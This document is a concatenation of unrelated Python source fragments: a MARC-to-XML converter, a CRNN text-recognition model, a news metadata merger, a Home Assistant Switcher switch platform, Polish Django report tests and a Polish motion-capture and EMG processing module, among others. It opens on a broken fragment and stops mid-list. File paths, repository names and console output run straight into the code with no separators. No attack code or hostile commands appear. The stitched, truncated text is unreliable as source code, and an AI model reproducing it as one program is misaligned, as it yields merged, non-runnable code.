$b? 
marc8 = MARC8ToUnicode(quiet=quiet) def translate(data): if type(data) == six.text_type: return data else: return marc8.translate(data) root = ET.Element('record') if namespace: root.set('xmlns', MARC_XML_NS) root.set('xmlns:xsi', XSI_NS) root.set('xsi:schemaLocation', MARC_XML_SCHEMA) leader = ET.SubElement(root, 'leader') leader.text = record.leader for field in record: if field.is_control_field(): control_field = ET.SubElement(root, 'controlfield') control_field.set('tag', field.tag) control_field.text = translate(field.data) else: data_field = ET.SubElement(root, 'datafield') data_field.set('tag', field.tag) data_field.set('ind1', field.indicators[0]) data_field.set('ind2', field.indicators[1]) for subfield in field: data_subfield = ET.SubElement(data_field, 'subfield') data_subfield.set('code', subfield[0]) data_subfield.text = translate(subfield[1]) return root dl/models/crnn/base.py1-10 from ..layers import * from ..base.model import ObjectRecognitionModelBase from .modules.codec import CTCCodec from ..._utils import _check_retval, _check_image, _get_normed_and_origin_img from torch.nn import functional as F import logging, abc class CRNNBase(ObjectRecognitionModelBase): def __init__(self, class_labels, input_shape, blankIndex): super().__init__(class_labels, input_shape) self.blankIndex = blankIndex self.codec = CTCCodec(class_labels, blankIndex) self.conv_layers = _check_retval('build_conv', self.build_conv(), nn.ModuleDict) self.rec_layers = _check_retval('build_rec', self.build_rec(), nn.ModuleDict) @property def encoder(self): return self.codec.encoder @property def decoder(self): return self.codec.decoder @abc.abstractmethod def build_conv(self): raise NotImplementedError() @abc.abstractmethod def build_rec(self): raise NotImplementedError() def forward(self, x, targets=None): """ :param x: input images tensor, shape = (b, c, h, w) :param targets: text numbers, list of tensor, represents number as text. 
tensor's shape = (length of text) :return: if training: predicts: output tensor, shape = (times, b, class_nums) targets: LongTensor, shape = (b, max length of text) pred_lengths: LongTensor, shape = (b,) target_lengths: LongTensor, shape = (b,) else: predicts: output tensor, shape = (times, b, class_nums) raw_texts: list(b) of str, raw strings decoded_texts: list(b) of str, decoded strings """ if self.training and targets is None: raise ValueError("pass \'targets\' for training mode") elif not self.training and targets is not None: logging.warning("forward as eval mode, but passed \'targets\'") batch_num = x.shape[0] for name, layer in self.conv_layers.items(): x = layer(x) b, c, h, w = x.shape assert h == 1, "the height of conv must be 1" # feature x = x.squeeze(2) # remove height due to 1 x = x.permute(2, 0, 1) # [w, b, c] for name, layer in self.rec_layers.items(): x = layer(x) if self.training: # apply log softmax for ctc loss, shape = (times, b, class_labels) predicts = F.log_softmax(x, dim=2) targets, target_lengths = self.encoder(targets) predict_lengths = torch.LongTensor([x.shape[0]] * batch_num) return predicts, targets, predict_lengths, target_lengths else: # apply softmax for prediction, shape = (times, b, class_labels) predicts = F.softmax(x, dim=2) raw_texts, out_texts = self.decoder(predicts) return predicts, raw_texts, out_texts def infer(self, image, toNorm=False): if self.training: raise NotImplementedError("call \'eval()\' first") # img: Tensor, shape = (b, c, h, w) img, orig_imgs = _check_image(image, self.device, size=(self.input_width, self.input_height)) # normed_img, orig_img: Tensor, shape = (b, c, h, w) normed_imgs, orig_imgs = _get_normed_and_origin_img(img, orig_imgs, (0.5,), (0.5,), toNorm, self.device) return self(normed_imgs)import json import csv import glob import errno import ast import config ############ Parsing Metadata File ############ def parse_metadata(metadata_path): metadata = {} with open(metadata_path) as csv_file: csv_reader = csv.reader(csv_file, delimiter=';') next(csv_reader) for row in csv_reader: metadata[int(row[1])] = { 'id_rumour': row[0], 'news_source': row[2], 'url': row[5], 'language': row[4], 'news_article_date': row[3], 'headline': '', 'subhead': '', 'body_text': '' } return metadata ############################################## ################### Scrapy ################### def parse_scrapy(scrapy_news_path,scrapy_news={}): sources = glob.glob(scrapy_news_path) for source in sources: with open(source, encoding='utf8') as f: json_file = json.load(f) news_articles = json_file['news_articles'] for news_article in news_articles: headline = news_article['headline'] subhead = news_article['subhead'] author = news_article['author'] body_text = news_article['body_text'] url = news_article['url'] datetime = news_article['datetime'] source = news_article['source'] scrapy_news[url] = { 'headline': headline, 'subhead': subhead, 'body_text': body_text } return scrapy_news ############################################## ############# Manual Collection ############## def parse_manual(man_col_path, manual_news={}): with open(man_col_path, encoding='utf8') as f: json_file = json.load(f) news_articles = json_file['news_articles'] for news_article in news_articles: #print(news_article) headline = news_article['title'] subhead = news_article['subtitle'] body_text = news_article['content'] url = news_article.get('link') id_news_article = news_article['id_news_article'] manual_news[int(id_news_article)] = { 'url': url, 'headline': headline, 'subhead': 
subhead, 'body_text': body_text } return manual_news ############################################## ################## Merging ################### def merge(metadata,scrapy_news,manual_news): for k,v in metadata.items(): url = metadata[k]['url'] #mnk = manual_news.keys() if(scrapy_news.get(url)): if(scrapy_news[url].get('headline')): metadata[k]['headline'] = scrapy_news[url]['headline'] if(scrapy_news[url].get('subhead')): metadata[k]['subhead'] = scrapy_news[url]['subhead'] if(scrapy_news[url].get('body_text')): body_text = scrapy_news[url]['body_text'] body_text = body_text.replace('\n', ' ').replace('\r', ' ') metadata[k]['body_text'] = ' '.join(body_text.split()) elif(manual_news.get(k)): if(manual_news[k].get('headline')): metadata[k]['headline'] = manual_news[k]['headline'] if(manual_news[k].get('subhead')): metadata[k]['subhead'] = manual_news[k]['subhead'] if(manual_news[k].get('body_text')): metadata[k]['body_text'] = manual_news[k]['body_text'] return metadata def save_merged(merged_path, parsed_news): news_file = open(merged_path, 'w', encoding='utf8') news_file.write(json.dumps(parsed_news, indent=4, ensure_ascii=False)) news_file.close() ############################################## ################ Sanity Check ################ def check_empty_values(parsed_news): print('Problems found at...') pcount = 0 for id_na, attrs in parsed_news.items(): problems = [] for k, v in attrs.items(): if k != 'subhead' and v == '': problems+=[k] pcount+=1 if(problems): #print('{}, {}, {}'.format(id_na, parsed_news[id_na]['news_source'], problems)) print('{}, {}, {}'.format(id_na, parsed_news[id_na]['url'], problems)) print('Total of {} problems found.'.format(pcount)) def check_missing_ids(parsed_news): ncount = 0 missing = [] keys = list(parsed_news.keys()) for count in range(len(keys)): count+=1 if(count not in keys): missing+=[count] print('Missing news: {}.'.format(missing)) def check_scrapy_error(scrapy_news): for k in scrapy_news.keys(): if not scrapy_news[k]['headline']: print(k, 'no headline') if not scrapy_news[k]['body_text']: print(k, 'no body text') ############################################## def main(): #Setting the paths scrapy_news_path = config.scrapy_news_path metadata_path = config.metadata_path man_col_path = config.man_sum_path merged_path = config.merged_path #Parse news collected with scrapy. scrapy_news = parse_scrapy(scrapy_news_path) #Check if scrapy data has errors. check_scrapy_error(scrapy_news) #Parse news manually collected. manual_news = parse_manual(man_col_path) #Parse csv metadata. metadata = parse_metadata(metadata_path) #Merge csv metadata, scrapy news and manual news. parsed_news = merge(metadata, scrapy_news, manual_news) #Save merged data. save_merged(merged_path,parsed_news) #Check if required attributes are valid. check_empty_values(parsed_news) #Check for missing sequential ids. #check_missing_ids(parsed_news) if __name__ == '__main__': main() Lodeiro0001/Python_VigoBusAPI """HELPERS Helper misc functions for external data management """ # # Native # # import inspect import datetime # # Project # # from vigobusapi.entities import Stop __all__ = ("get_package", "add_stop_created_timestamp") def get_package(function) -> str: """Return the package name from the given object (usually a function). Only return the last package (inmediate first parent of the object). 
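For example (the module path is illustrative): a function defined in a module
named "some_project.services.helpers" yields "helpers".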
""" return inspect.getmodule(function).__name__.split(".")[-1] def add_stop_created_timestamp(stop: Stop) -> Stop: """Add the 'created' field to the given Stop object, with the current datetime timestamp. The timestamp is created as a datetime object in the current local time and timezone. The input object is modified in-place. The same object is returned. """ utc_dt = datetime.datetime.now(datetime.timezone.utc) # UTC time local_dt = utc_dt.astimezone() # local time stop.created = local_dt return stop code/r_independence.py # -*- coding: utf-8 -*- # @Author: # @Date: 2016-12-14 22:10:04 # @Last Modified by: # @Last Modified time: 2016-12-15 12:07:46 import rpy2 import rpy2.robjects.numpy2ri import rpy2.robjects.pandas2ri import numpy as np from rpy2.robjects.packages import importr rpy2.robjects.numpy2ri.activate() rpy2.robjects.pandas2ri.activate() dHSIC_R = importr('dHSIC') bnlearn = importr('bnlearn') class dHSIC: def __init__(self, X, Y, alpha=0.05, method="gamma", kernel="gaussian", B=100, pairwise=False): self.res = dHSIC_R.dhsic_test(X, Y, alpha, method, kernel, B, pairwise) self.statistic = tuple(self.res[0])[0] self.critic_value = tuple(self.res[1])[0] self.p_value = tuple(self.res[2])[0] class CI: def __init__(self, X_var, Y_var, Z_vars, data, test='corr'): Z_vars = np.array(Z_vars) self.res = bnlearn.ci_test(X_var, Y_var, Z_vars, data, test=test) self.statistic = self.res[0][0] self.p_value = self.res[1][0] if __name__ == '__main__': passex011.py cor = {'traço': '\033[35m', 'ex': '\033[4;31m', 'título': '\033[1;34m', 'med': '\033[1;33m', 'res': '\033[1;32m', 'reset': '\033[m'} print('{}-=-{}'.format(cor['traço'], cor['reset'])*18, '{} Exercício 011 {}'.format(cor['ex'], cor['reset']), '{}-=-{}'.format(cor['traço'], cor['reset'])*18) print('{}Faça um programa que leia a largura e a altura de uma parede em metros, calcule a sua área e a quantidade de ' 'tinta necessária \npara pintá-la, sabendo que cada litro de tinta pinta uma área de 2 metros quadrados.{}' .format(cor['título'], cor['reset'])) print('{}-=-{}'.format(cor['traço'], cor['reset'])*42) comp = float(input('Qual o comprimento da parede (m): ')) alt = float(input('Qual a altura da parede (m): ')) area = comp * alt print('Em uma parede com dimenssões de {}{}{} x {}{}{} terá uma área de {}{:.2f}{}m².' .format(cor['med'], comp, cor['reset'], cor['med'], alt, cor['reset'], cor['res'], area, cor['reset'])) tinta = area / 2 print('Sendo assim, será preciso {}{:.3f}{} litros de tinta para pintá-la!'.format(cor['res'], tinta, cor['reset'])) firebot/modules/sql_helper/broadcast_sql.py10-100 from sqlalchemy import Column, String from . import BASE, SESSION class Broadcast(BASE): __tablename__ = "Broadcast" chat_id = Column(String(14), primary_key=True) def __init__(self, chat_id): self.chat_id = chat_id Broadcast.__table__.create(checkfirst=True) def add_chnnl_in_db(chat_id: int): chnnl_id = Broadcast(str(chat_id)) SESSION.add(chnnl_id) SESSION.commit() def get_all_chnnl(): stark = SESSION.query(Broadcast).all() SESSION.close() return stark def already_added(chat_id): try: return SESSION.query(Broadcast).filter(Broadcast.chat_id == str(chat_id)).one() except: return None finally: SESSION.close() def rm_channel(chat_id): remove = SESSION.query(Broadcast).get(str(chat_id)) if remove: SESSION.delete(remove) SESSION.commit() from django.apps import AppConfig class DialogflowapiConfig(AppConfig): name = 'DialogflowApi' from blanc_basic_pages.views import lazy_page from django.conf.urls import url from . 
import views urlpatterns = [ url(r'^$', views.ContactFormView.as_view(), name='form'), url(r'^thanks/$', lazy_page, name='form-thanks'), ] from django.contrib.auth import logout from django.shortcuts import redirect __author__ = 'tmehta' def logout_user(request): logout(request) return redirect('/')data/__all_models.py # Add all your SQLAlchemy models here. # This allows us to import just this file when # we need to preload the models and ensure they # are all loaded. import crud.data.post import crud.data.users 0 ต้องการโอน 2000 คุณมีเงิน 998 กรุณาโอนเงินเข้าบัญชี เงินไม่พอโอน ฝากเงินเท่าไหร่ ?: 200 --- คุณมีเงิน 1198 กรุณาโอนเงินเข้าบัญชี เงินไม่พอโอน ฝากเงินเท่าไหร่ ?: 900 --- คุณมีเงิน 2098 โอนได้เลย เหลือเงินในบัญชี: 83 ***Repl Closed*** import math print(math.fsum([.1, .1, .1, .1, .1, .1, .1, .1, .1, .1])) """Switcher integration Switch platform.""" from __future__ import annotations import asyncio from datetime import timedelta import logging from typing import Any from aioswitcher.api import Command, SwitcherApi, SwitcherBaseResponse from aioswitcher.device import DeviceCategory, DeviceState import voluptuous as vol from homeassistant.components.switch import ( DEVICE_CLASS_OUTLET, DEVICE_CLASS_SWITCH, SwitchEntity, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant, callback from homeassistant.helpers import ( config_validation as cv, device_registry, entity_platform, ) from homeassistant.helpers.dispatcher import async_dispatcher_connect from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from . import SwitcherDeviceWrapper from .const import ( CONF_AUTO_OFF, CONF_TIMER_MINUTES, SERVICE_SET_AUTO_OFF_NAME, SERVICE_TURN_ON_WITH_TIMER_NAME, SIGNAL_DEVICE_ADD, ) _LOGGER = logging.getLogger(__name__) SERVICE_SET_AUTO_OFF_SCHEMA = { vol.Required(CONF_AUTO_OFF): cv.time_period_str, } SERVICE_TURN_ON_WITH_TIMER_SCHEMA = { vol.Required(CONF_TIMER_MINUTES): vol.All( cv.positive_int, vol.Range(min=1, max=150) ), } async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback, ) -> None: """Set up Switcher switch from config entry.""" platform = entity_platform.async_get_current_platform() platform.async_register_entity_service( SERVICE_SET_AUTO_OFF_NAME, SERVICE_SET_AUTO_OFF_SCHEMA, "async_set_auto_off_service", ) platform.async_register_entity_service( SERVICE_TURN_ON_WITH_TIMER_NAME, SERVICE_TURN_ON_WITH_TIMER_SCHEMA, "async_turn_on_with_timer_service", ) @callback def async_add_switch(wrapper: SwitcherDeviceWrapper) -> None: """Add switch from Switcher device.""" if wrapper.data.device_type.category == DeviceCategory.POWER_PLUG: async_add_entities([SwitcherPowerPlugSwitchEntity(wrapper)]) elif wrapper.data.device_type.category == DeviceCategory.WATER_HEATER: async_add_entities([SwitcherWaterHeaterSwitchEntity(wrapper)]) config_entry.async_on_unload( async_dispatcher_connect(hass, SIGNAL_DEVICE_ADD, async_add_switch) ) class SwitcherBaseSwitchEntity(CoordinatorEntity, SwitchEntity): """Representation of a Switcher switch entity.""" def __init__(self, wrapper: SwitcherDeviceWrapper) -> None: """Initialize the entity.""" super().__init__(wrapper) self.wrapper = wrapper self.control_result: bool | None = None # Entity class attributes self._attr_name = wrapper.name self._attr_unique_id = f"{wrapper.device_id}-{wrapper.mac_address}" self._attr_device_info = { "connections": { 
(device_registry.CONNECTION_NETWORK_MAC, wrapper.mac_address) } } @callback def _handle_coordinator_update(self) -> None: """When device updates, clear control result that overrides state.""" self.control_result = None self.async_write_ha_state() async def _async_call_api(self, api: str, *args: Any) -> None: """Call Switcher API.""" _LOGGER.debug("Calling api for %s, api: '%s', args: %s", self.name, api, args) response: SwitcherBaseResponse = None error = None try: async with SwitcherApi( self.wrapper.data.ip_address, self.wrapper.device_id ) as swapi: response = await getattr(swapi, api)(*args) except (asyncio.TimeoutError, OSError, RuntimeError) as err: error = repr(err) if error or not response or not response.successful: _LOGGER.error( "Call api for %s failed, api: '%s', args: %s, response/error: %s", self.name, api, args, response or error, ) self.wrapper.last_update_success = False @property def is_on(self) -> bool: """Return True if entity is on.""" if self.control_result is not None: return self.control_result return bool(self.wrapper.data.device_state == DeviceState.ON) async def async_turn_on(self, **kwargs: Any) -> None: """Turn the entity on.""" await self._async_call_api("control_device", Command.ON) self.control_result = True self.async_write_ha_state() async def async_turn_off(self, **kwargs: Any) -> None: """Turn the entity off.""" await self._async_call_api("control_device", Command.OFF) self.control_result = False self.async_write_ha_state() async def async_set_auto_off_service(self, auto_off: timedelta) -> None: """Use for handling setting device auto-off service calls.""" _LOGGER.warning( "Service '%s' is not supported by %s", SERVICE_SET_AUTO_OFF_NAME, self.name, ) async def async_turn_on_with_timer_service(self, timer_minutes: int) -> None: """Use for turning device on with a timer service calls.""" _LOGGER.warning( "Service '%s' is not supported by %s", SERVICE_TURN_ON_WITH_TIMER_NAME, self.name, ) class SwitcherPowerPlugSwitchEntity(SwitcherBaseSwitchEntity): """Representation of a Switcher power plug switch entity.""" _attr_device_class = DEVICE_CLASS_OUTLET class SwitcherWaterHeaterSwitchEntity(SwitcherBaseSwitchEntity): """Representation of a Switcher water heater switch entity.""" _attr_device_class = DEVICE_CLASS_SWITCH async def async_set_auto_off_service(self, auto_off: timedelta) -> None: """Use for handling setting device auto-off service calls.""" await self._async_call_api("set_auto_shutdown", auto_off) self.async_write_ha_state() async def async_turn_on_with_timer_service(self, timer_minutes: int) -> None: """Use for turning device on with a timer service calls.""" await self._async_call_api("control_device", Command.ON, timer_minutes) self.control_result = True self.async_write_ha_state() # -*- encoding: utf-8 -*- import os import sys import uuid import pytest from django.apps import apps from django.contrib.auth.models import Group from django.core.files.base import ContentFile try: from django.core.urlresolvers import reverse except ImportError: from django.urls import reverse from django.db import transaction from django.http import Http404 from django.test.utils import override_settings from django.utils import timezone from model_mommy import mommy from bpp.models import Typ_KBN, Jezyk, Charakter_Formalny, Typ_Odpowiedzialnosci from bpp.tests.tests_legacy.testutil import UserTestCase, UserTransactionTestCase from bpp.tests.util import any_jednostka, any_autor, any_ciagle from bpp.util import rebuild_contenttypes from bpp.views.raporty import 
RaportSelector, PodgladRaportu, KasowanieRaportu from celeryui.models import Report class TestRaportSelector(UserTestCase): def test_raportselector(self): p = RaportSelector() p.request = self.factory.get('/') p.get_context_data() def test_raportselector_with_reports(self): for x, kiedy_ukonczono in enumerate([timezone.now(), None]): mommy.make( Report, arguments={}, file=None, finished_on=kiedy_ukonczono) self.client.get(reverse('bpp:raporty')) def test_tytuly_raportow_kronika_uczelni(self): any_ciagle(rok=2000) rep = Report.objects.create( ordered_by=self.user, function="kronika-uczelni", arguments={"rok": "2000"}) res = self.client.get(reverse('bpp:raporty')) self.assertContains( res, "Kronika Uczelni dla roku 2000", status_code=200) def test_tytuly_raportow_raport_dla_komisji_centralnej(self): a = any_autor("Kowalski", "Jan") rep = Report.objects.create( ordered_by=self.user, function="raport-dla-komisji-centralnej", arguments={"autor": a.pk}) res = self.client.get(reverse('bpp:raporty')) self.assertContains( res, "Raport dla Komisji Centralnej - %s" % str(a), status_code=200) class RaportMixin: def zrob_raport(self): r = mommy.make( Report, file=None, function="kronika-uczelni", arguments='{"rok":"2013"}') return r class TestPobranieRaportu(RaportMixin, UserTestCase): def setUp(self): UserTestCase.setUp(self) self.r = self.zrob_raport() error_class = OSError if sys.platform.startswith('win'): error_class = WindowsError try: os.unlink( os.path.join(settings.MEDIA_ROOT, 'raport', 'test_raport')) except error_class: pass self.r.file.save("test_raport", ContentFile("hej ho")) def test_pobranie_nginx(self): # Raport musi byc zakonczony, ineczej nie ma pobrania self.r.finished_on = timezone.now() self.r.save() with override_settings(SENDFILE_BACKEND='sendfile.backends.nginx'): url = reverse('bpp:pobranie-raportu', kwargs=dict(uid=self.r.uid)) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertIn('x-accel-redirect', resp._headers) class TestPodgladRaportu(RaportMixin, UserTestCase): def setUp(self): UserTestCase.setUp(self) self.r = self.zrob_raport() def test_podgladraportu(self): p = PodgladRaportu() p.kwargs = {} p.kwargs['uid'] = self.r.uid self.assertEqual(p.get_object(), self.r) p.kwargs['uid'] = str(uuid.uuid4()) self.assertRaises(Http404, p.get_object) def test_podgladraportu_client(self): url = reverse('bpp:podglad-raportu', kwargs=dict(uid=self.r.uid)) resp = self.client.get(url) self.assertContains(resp, 'Kronika Uczelni', status_code=200) class KasowanieRaportuMixin: def setUp(self): self.r = self.zrob_raport() self.r.ordered_by = self.user self.r.save() class TestKasowanieRaportu(KasowanieRaportuMixin, RaportMixin, UserTestCase): def setUp(self): UserTestCase.setUp(self) KasowanieRaportuMixin.setUp(self) def test_kasowanieraportu(self): k = KasowanieRaportu() k.kwargs = dict(uid=self.r.uid) class FakeRequest: user = self.user k.request = FakeRequest() k.request.user = None self.assertRaises(Http404, k.get_object) k.request.user = self.user self.assertEqual(k.get_object(), self.r) def test_kasowanieraportu_client(self): self.assertEqual(Report.objects.count(), 1) url = reverse('bpp:kasowanie-raportu', kwargs=dict(uid=self.r.uid)) resp = self.client.get(url) self.assertRedirects(resp, reverse("bpp:raporty")) self.assertEqual(Report.objects.count(), 0) from django.conf import settings class TestWidokiRaportJednostek2012(UserTestCase): # fixtures = ['charakter_formalny.json', # 'jezyk.json', # 'typ_kbn.json', # 'typ_odpowiedzialnosci.json'] def 
setUp(self): UserTestCase.setUp(self) self.j = any_jednostka() Typ_KBN.objects.get_or_create(skrot="PW", nazwa="Praca wieloośrodkowa") Jezyk.objects.get_or_create(skrot='pol.', nazwa='polski') Charakter_Formalny.objects.get_or_create(skrot='KSZ', nazwa='Książka w języku obcym') Charakter_Formalny.objects.get_or_create(skrot='KSP', nazwa='Książka w języku polskim') Charakter_Formalny.objects.get_or_create(skrot='KS', nazwa='Książka') Charakter_Formalny.objects.get_or_create(skrot='ROZ', nazwa='') Group.objects.get_or_create(name="wprowadzanie danych") def test_jeden_rok(self): url = reverse("bpp:raport-jednostek-rok-min-max", args=(self.j.pk, 2010, 2013)) res = self.client.get(url) self.assertContains( res, "Dane o publikacjach za okres 2010 - 2013", status_code=200) def test_zakres_lat(self): url = reverse("bpp:raport-jednostek", args=(self.j.pk, 2013)) res = self.client.get(url) self.assertContains( res, "Dane o publikacjach za rok 2013", status_code=200) class TestRankingAutorow(UserTestCase): def setUp(self): UserTestCase.setUp(self) rebuild_contenttypes() Typ_Odpowiedzialnosci.objects.get_or_create(skrot='aut.', nazwa='autor') Group.objects.get_or_create(name="wprowadzanie danych") j = any_jednostka() a = any_autor(nazwisko="Kowalski") c = any_ciagle(impact_factor=200, rok=2000) c.dodaj_autora(a, j) def test_renderowanie(self): url = reverse("bpp:ranking-autorow", args=(2000, 2000)) res = self.client.get(url) self.assertContains( res, "Ranking autorów", status_code=200) self.assertContains(res, "Kowalski") def test_renderowanie_csv(self): url = reverse("bpp:ranking-autorow", args=(2000, 2000)) res = self.client.get(url, data={"_export": "csv"}) self.assertContains( res, '", dr",Jednostka') 0 import btk import glob import pandas as pd import numpy as np import matplotlib.pyplot as plt import importlib from ezc3d import c3d from pyomeca import Analogs from pyomeca import Markers from matplotlib.pyplot import subplot def cropp_c3dfile(eventsFrame, filename, destiny): """ Funkcja oddzielajaca pojedyncze ruchy w odrebne pliki na podstawie danych o markerach. Input: -eventsFrame - poczatek i koniec wycinka w formacie [[a,b],[a,b],...] -filename - sciezka pliku do podzielenia -destiny - sciezka, do ktorej zostana zapisane wyodrebnione czesci Output: - Podzielone pliki c3d zawierajace dane o pojedynczym ruchu """ reader = btk.btkAcquisitionFileReader() reader.SetFilename(filename) reader.Update() acq = reader.GetOutput() writer = btk.btkAcquisitionFileWriter() for i in range(0, len(eventsFrame)): clone = acq.Clone(); clone.ResizeFrameNumberFromEnd(acq.GetLastFrame() - eventsFrame[i][0] + 1) clone.ResizeFrameNumber(eventsFrame[i][1] - eventsFrame[i][0] + 1) clone.SetFirstFrame(eventsFrame[i][0]) clone.ClearEvents() for e in btk.Iterate(acq.GetEvents()): if ((e.GetFrame() > clone.GetFirstFrame()) and (e.GetFrame() < clone.GetLastFrame())): clone.AppendEvent(e) clone.SetFirstFrame(1) writer.SetInput(clone) writer.SetFilename(destiny + '\\' + (filename.split('\\')[-1]).split('.')[0]+ '-K' + str(i+1) + '.c3d') writer.Update() def read_labels(data_path,frame_rate): """ Funkcja zwraca tablice [p, k], w której są zapisane czasy eventow oznaczających przyjecie postawy poczatkowej. 
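Example (the path and the 200 Hz marker frame rate are illustrative):

    p, k = read_labels('path/to/recording.c3d', 200)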
Input: - data_path - sciezka do pliku c3d - frame_rate - częstotliwośc próbkowania danych w pliku Output: - [p,k] - tablice punktów startowych (s) i końcowych(k) """ c3d_to_compare= c3d(data_path) event = c3d_to_compare['parameters']['EVENT']['LABELS']['value'] czas = np.around(c3d_to_compare['parameters']['EVENT']['TIMES']['value'][1]*frame_rate) eventy = [event, czas] eventy[0].index('Foot Strike') indxE = [i for i, x in enumerate(eventy[0]) if x == "Event"] indxFS = [i for i, x in enumerate(eventy[0]) if x == "Foot Strike"] CzasFS = np.zeros(len(indxFS)) for i in range(len(indxFS)): CzasFS[i] = eventy[1][indxFS[i]] CzasE = np.zeros(len(indxE)) for i in range(len(indxE)): CzasE[i] = eventy[1][indxE[i]] eventy[1].sort() p = [] k = [] for i in range(len(eventy[1])): if not i >= len(eventy[1])-2: pierwszy = eventy[1][i] drugi = eventy[1][i+1] trzeci = eventy[1][i+2] if pierwszy in CzasE: if drugi in CzasFS: if trzeci in CzasE: p.append(int(pierwszy)) k.append(int(trzeci)) return [p,k] def nowy_czas_marker(numer_markera,ev,markers): """ Funkcja do obliczania nowego punktu startowego (s) i końcowego (k). Input: - numer_markera - numer markera według któreg liczymy nowe punkty (sugerowana prawa dłoń lub prawa stopa) - ev - początek i koniec ruchu na podstawie eventów (to co zwraca funkcja read_labels) - markers - współrzędne markerów (Markers.from_c3d(data_path, prefix_delimiter=":")) Output: - [s,k] - nowe punkty startowe (s) i końcowe(k) """ s=np.zeros(len(ev[0])) k=np.zeros(len(ev[0])) #liczymy rozniczkę dla każdego uderzenia (od eventu postawy początkowej do eventu postawy początkowej for i in range(len(ev[0])): output_difference=np.diff(markers[1][numer_markera][ev[0][i]:ev[1][i]]) #ustalenie nowego startu i końca ruchu dz=max(output_difference)*0.2 dx=min(output_difference)*0.9 s[i]=np.argmax(output_difference>dz)-40 k[i]=len(output_difference) - np.argmax(output_difference[::-1]>dx)+40 #warunki, które mają zabezpieczać przed wyjściem za zakres pociętego nagrania if s[i]<0: s[i]=0 if k[i]>ev[1][i]: k[i]=ev[1][i] return [s,k] def nowy_czas_analog(p,d,analogs): """ Funkcja do obliczania nowego punktu startowego (s) i końcowego (k). Input: - p,d - początek i koniec ruchu na podstawie eventów (p,d - to co zwraca funkcja read_labels) - analogs - przegieg sygnału EMG dla wybranego mięśnia ((Analogs.from_c3d(datapath, usecols=muscles))[numer_mięśnia]) Output: - [s,k] - nowe punkty startowe (s) i końcowe(k) """ ev=[p,d] s=np.zeros(len(ev[0])) k=np.zeros(len(ev[0])) #liczymy rozniczkę dla każdego uderzenia (od eventu postawy początkowej do eventu postawy początkowej for i in range(len(ev[0])): output_difference=np.diff(analogs[ev[0][i]:ev[1][i]]) #ustalenie nowego startu i końca ruchu dz=max(output_difference)*0.2 dx=min(output_difference)*0.9 s[i]=np.argmax(output_difference>dz) k[i]=len(output_difference) - np.argmax(output_difference>dx) #warunki, które mają zabezpieczać przed wyjściem za zakres pociętego nagrania if s[i]<0: s[i]=0 if k[i]>ev[1][i]: k[i]=ev[1][i] return [s,k] def przesuwanie_wykresow(ev,numer_markera,s,k,markers): """ Funkcja do wyświetlania wykresów markerów przesuniętych w fazie. 
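Example (illustrative; the marker index is hypothetical and should point at
the right hand or right foot marker):

    markers = Markers.from_c3d(data_path, prefix_delimiter=":")
    ev = read_labels(data_path, 200)
    numer_markera = 10  # hypothetical marker index
    s, k = nowy_czas_marker(numer_markera, ev, markers)
    przesuwanie_wykresow(ev, numer_markera, s, k, markers)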
Input: - ev - początek i koniec ruchu na podstawie eventów (to co zwraca funkcja read_labels) - s,k - nowege punkty startowe i końcowe (zwraca je funkcja nowy_czas_marker) - numer_markera - określa dla którego markera chcemy wyświetlić wykres - markers - współrzędne markerów (Markers.from_c3d(data_path, prefix_delimiter=":")) Output: - Wykresy położenia zadanego markera """ #robimy z k i s inty, bo były z tym problemy #tworzymy nową tablicę zawierającą czasy startu i końca ruchu evi=np.zeros((len(ev),len(ev[0]))) for i in range(len(ev[0])): k.astype(int) s.astype(int) evi[1][i]=ev[0][i]+k[i] evi[0][i]=ev[0][i]+s[i] #dla 3 osi robimy pętlę z robieniem wykresu for j in range(3): #dla ilości powtórzeń (zwykle 10) robimy pętlę żeby wyrzucało je na tym samym wykresie for i in range(len(evi[0])): #normalizacja markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]=(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]-min(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]))/(max(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])])-min(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])])) #operacja żeby rozciągnąć wykresy na tym samym okresie czasu (0-100) t_konc=100 dl_ciagu=int(evi[1][i])-int(evi[0][i]) x=np.linspace(0,t_konc, dl_ciagu) #plotowanie wykresu, w danej osi (ponieważ jest w pętli to zrobi się dla 3), dla danego numeru markera, od klatki startowej do końcowej plt.plot(x, markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]) plt.show() def wykresy_markerow(path,markers): """ Funkcja do wyświetlania wykresów markerów. Input: - path - ściezka do pliku c3d - markers - współrzędne markerów (Markers.from_c3d(path, prefix_delimiter=":")) Output: - Wykresy położenia markerów """ c = c3d(path) n_markers = ["LSHO","LELB","LWRA","RSHO","RELB","RWRA","RASI","RKNE","RANK"] # lista waznych markerow axes = ["x","y","z"] body = path.split('-')[3]+":" p,k = read_labels(path,200) for mark in markers: n = c['parameters']['POINT']['LABELS']['value'][0:44].index(body+mark) for i in range(3): for j in range(len(p)): plt.plot(c['data']['points'][i][n][p[j]:k[j]]) plt.title(axes[i]) plt.show() def read_analog_allmuscles(datapath): """ Funkcja do wczytywania danych EMG dla wszystkich mięśni z pliku c3d. Input: - datapath - ścieżka do pliku c3d z danymi Output: - emg - dane EMG z wczytanego pliku dla wszystkich mięśni """ muscles = ["Voltage.1","Voltage.2","Voltage.3","Voltage.4","Voltage.5","Voltage.6","Voltage.7","Voltage.8","Voltage.9","Voltage.10","Voltage.11","Voltage.12","Voltage.13","Voltage.14","Voltage.15","Voltage.16"] emg = Analogs.from_c3d(datapath, usecols=muscles) return emg def rename_emg(emg): """ Funkcja do zmiany nazw kanałów EMG na nazwy odpowiadających im mięśni. Input: - emg - dane EMG z wczytanego pliku dla wszystkich mięśni z oryginalnymi nagłówkami (Analogs.from_c3d(datapath, usecols=muscles)) Output: - emg - dane EMG z wczytanego pliku dla wszystkich mięśni ze zmienionymi nagłówkami """ muscles_names = ["Czworoboczny grzbietu L","Trójgłowy ramienia L", "Dwugłowy ramienia L", "Prostownik nadgarstka L","Skośny brzucha L", "Pośladkowy średni L","Czworogłowy uda L", "Brzuchaty łydki L","Czworoboczny grzbietu P","Trójgłowy ramienia P", 